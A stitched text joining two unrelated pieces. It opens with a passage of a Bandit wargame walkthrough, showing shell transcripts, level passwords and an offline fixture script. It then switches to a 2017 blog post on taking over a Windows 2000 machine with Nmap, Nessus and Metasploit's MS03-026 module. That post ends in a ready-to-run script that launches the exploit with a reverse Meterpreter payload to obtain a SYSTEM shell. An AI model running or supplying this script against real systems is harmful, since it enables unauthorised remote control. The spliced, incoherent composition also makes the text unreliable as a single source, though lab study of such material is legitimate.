-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file05
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file06
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file07
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file08
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file09
bandit4@melissa:~/inhere$ file ./-*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@melissa:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh <-- Password for the next level
Level 4 -> 5
Log in with username 'bandit5' and password 'koReBOKuIDDepwhWk7jZC0RTdopnAYKh'.
This is similar to the previous level, except we have more file attributes to match (the level says: human-readable, 1033 bytes, not executable) and more files to look through. Size alone turned out to be enough to narrow it to one file.
bandit5@melissa:~$ ls
inhere
bandit5@melissa:~$ cd inhere
bandit5@melissa:~/inhere$ ls -la
total 88
drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere00
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere01
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere02
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere03
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere04
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere05
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere06
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere07
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere08
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere09
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere10
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere11
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere12
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere13
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere14
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere15
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere16
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere17
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere18
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere19
bandit5@melissa:~/inhere$ find ./ -size 1033c
./maybehere07/.file2
bandit5@melissa:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7 <-- Password for the next level
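The two searches above (levels 3 -> 4 and 4 -> 5), rebuilt as a script over a constructed fixture so they can be run offline. This is an added example, not code from the original write-up: the directory layout, file names and sizes are assumptions modelled on the listings, and the readability test is a byte-level substitute for the file command so the script does not depend on file(1) being installed. The same 2>/dev/null redirect used in level 5 -> 6 appears here to hide find's permission errors.

```shell
#!/bin/sh
# Added example, not part of the original write-up: the Bandit 3->4 and
# 4->5 searches run against a constructed fixture instead of the game
# server. The directory layout, file names and sizes are assumptions
# modelled on the listings above.
set -eu

# Byte-level stand-in for `file ... | grep 'ASCII text'`: a file is human
# readable when every byte is printable ASCII or whitespace. This avoids
# depending on file(1) being installed.
is_text() {
    [ "$(LC_ALL=C tr -d '[:print:][:space:]' < "$1" | wc -c | tr -d ' ')" -eq 0 ]
}

# Level 3->4 pattern: one readable file among several whose names begin
# with '-'. Every name is reached through its directory path (./-file07
# style), so no tool ever sees a bare '-file07' and parses it as an option.
find_readable() {
    for f in "$1"/* "$1"/.[!.]*; do
        if [ -f "$f" ] && is_text "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Level 4->5 pattern: exact size, human readable, not executable. find(1)
# narrows by size (the 'c' suffix means bytes) and by mode; is_text does
# the readability check the write-up delegated to file(1). As in level
# 5->6, 2>/dev/null hides 'Permission denied' noise from unreadable dirs.
find_sized() {
    find "$1" -type f -size "${2}c" ! -perm -100 2>/dev/null |
    while IFS= read -r f; do
        if is_text "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# N bytes of printable text ending in a newline (used to build the fixture).
text_bytes() {
    head -c "$(($1 - 1))" /dev/zero | tr '\0' 'y'
    echo
}

# Constructed fixture (an assumed layout, not the real server): ten
# '-fileNN' entries of which only -file07 is text, plus twenty maybehereNN
# directories holding decoys that each fail exactly one of the 4->5 criteria.
make_fixture() {
    dir=$1
    mkdir -p "$dir/inhere"
    i=0
    while [ "$i" -lt 10 ]; do
        name="-file$(printf '%02d' "$i")"
        if [ "$i" -eq 7 ]; then
            printf 'sample-password-for-the-next-level\n' > "$dir/inhere/$name"
        else
            head -c 33 /dev/zero > "$dir/inhere/$name"   # file(1) would call this "data"
        fi
        i=$((i + 1))
    done
    i=0
    while [ "$i" -lt 20 ]; do
        mkdir -p "$dir/inhere/maybehere$(printf '%02d' "$i")"
        i=$((i + 1))
    done
    head -c 1033 /dev/zero > "$dir/inhere/maybehere00/.file1"   # right size, not readable
    text_bytes 1033 > "$dir/inhere/maybehere07/.file2"          # the one we want
    text_bytes 1033 > "$dir/inhere/maybehere12/file3"
    chmod u+x "$dir/inhere/maybehere12/file3"                    # readable, but executable
    text_bytes 1032 > "$dir/inhere/maybehere19/.file4"          # readable, wrong size
}

# Stand-alone run: build the fixture in a temporary directory and search it.
demo() {
    tmp=$(mktemp -d)
    make_fixture "$tmp"
    echo "3->4: readable file among the dash-named ones:"
    find_readable "$tmp/inhere"
    echo "4->5: 1033-byte readable non-executable file:"
    find_sized "$tmp/inhere" 1033
    rm -rf "$tmp"
}
demo
```

Run it with sh; the fixture is created under a temporary directory and removed afterwards. The habit worth keeping from it is reaching dash-prefixed names through a path (./-file07), which is exactly why file ./-* worked in the transcript above while a bare -file07 would not have.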
Level 5 -> 6
Log in with username 'bandit6' and password 'DXjZPULLxYr17uwoI01bNLQbtFemEgo7'.
This time the file can be anywhere on the server, but we are given its attributes: owned by user bandit7, owned by group bandit6, and 33 bytes in size. That is a job for find, started from the root directory. The 2>/dev/null at the end of the command discards the 'Permission denied' messages that find prints on stderr for every directory bandit6 is not allowed to enter; without it the single matching path would be buried in that noise.
bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs <-- Password for the next level
Tuesday, July 25, 2017
Way to HACK an Operating System using Metasploit
We can gain access to one operating system from another and then do anything we like on the machine we compromised. A few conditions have to be satisfied first:
- Both operating systems must be on the same IP range, so that they can reach each other directly.
- The target OS must have a vulnerability that we are able to exploit.
Let's see this with a simple example.
Here the vulnerable OS is Windows 2000 (you can try the same process against other operating systems), and I am going to exploit it from Kali Linux.
The process needs a few key tools:
- Nmap
- Nessus
- Exploit-DB
- Metasploit
Now let's look at the process.
First, configure Kali and Windows 2000 with addresses in the same IP range; if they are on different ranges the two machines cannot ping each other.
(The original post shows screenshots of Kali's IP address and of the Windows 2000 IP address at this point.)
Then ping each machine from the other with ping <other machine's IP address>. A reply confirms that the two machines can reach each other.
Next, use nmap to find the open ports on Windows 2000: nmap <Windows 2000's IP address>.
Then identify vulnerabilities with Nessus, which lists its findings grouped by criticality. These are the vulnerabilities found on Windows 2000. We cannot exploit all of them, so the next step is to find one that has a working exploit.
Start Metasploit with the command msfconsole.
To find an exploit for a vulnerability reported by Nessus, search for its identifier: search <the code of the vulnerability found by Nessus>.
Here I am trying the MS03-026: Microsoft RPC Interface Buffer Overrun (823980) vulnerability.
(The remaining msfconsole steps are shown as screenshots in the original post.)
Exploiting this vulnerability gives us a Meterpreter session on the target through Metasploit, and from it a Windows 2000 shell running as SYSTEM, the Windows equivalent of root.
We now have a SYSTEM-level shell on Windows 2000 and can control it from Kali.
As an example, we can retrieve the system information and network configuration of the Windows machine from Kali.
The Windows 2000 desktop (UI) can also be reached from Kali once the machine has been exploited in this way.
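The steps above, collected into one script as an added example; it is not the post's own code, whose msfconsole steps survive only as screenshots. The IP addresses and netmask are assumptions, the module name exploit/windows/dcerpc/ms03_026_dcom and the RHOSTS, PAYLOAD and LHOST options are Metasploit's own, and the script only launches ping, nmap and msfconsole when given its three arguments.

```shell
#!/bin/sh
# Added example, not part of the original post: the pre-flight checks and
# the Metasploit invocation for the MS03-026 (DCOM RPC) exploit, assembled
# into one script. IP addresses and netmask are assumptions; the module
# and option names are Metasploit's own.
set -eu

# Dotted-quad IPv4 address -> integer (the subshell keeps the IFS change local).
ip_to_int() (
    IFS=.
    set -- $1
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
)

# The "same IP range" condition from the post: true when both hosts fall
# in the same network under the given netmask.
same_subnet() {   # same_subnet IP1 IP2 NETMASK
    mask=$(ip_to_int "$3")
    [ "$(( $(ip_to_int "$1") & mask ))" -eq "$(( $(ip_to_int "$2") & mask ))" ]
}

# The msfconsole commands behind the screenshots: select the module for
# MS03-026, point it at the target, choose a reverse Meterpreter payload
# that calls back to Kali, and run it.
msf_commands() {   # msf_commands TARGET_IP KALI_IP
    printf 'use exploit/windows/dcerpc/ms03_026_dcom; set RHOSTS %s; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST %s; exploit' "$1" "$2"
}

# Full procedure: subnet check, ping, port scan of the DCOM RPC endpoint
# (TCP 135, the port this module attacks), then the exploit. Once the
# Meterpreter prompt appears, sysinfo, ipconfig and getuid show the
# system information, the network configuration and the SYSTEM user.
attack() {   # attack TARGET_IP KALI_IP NETMASK
    same_subnet "$1" "$2" "$3" || { echo "hosts are not on the same subnet" >&2; return 1; }
    ping -c 1 -W 2 "$1" >/dev/null || { echo "target does not answer ping" >&2; return 1; }
    nmap -p 135 "$1"
    msfconsole -q -x "$(msf_commands "$1" "$2")"
}

# Usage: sh this_script.sh <windows 2000 IP> <kali IP> <netmask>
if [ "$#" -eq 3 ]; then
    attack "$@"
fi
```

same_subnet and msf_commands can be exercised on any machine; attack needs ping, nmap and msfconsole, i.e. Kali, and a lab target such as the Windows 2000 box described above.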
I hope this post is clear. If you have any doubts, feel free to send me a mail. :)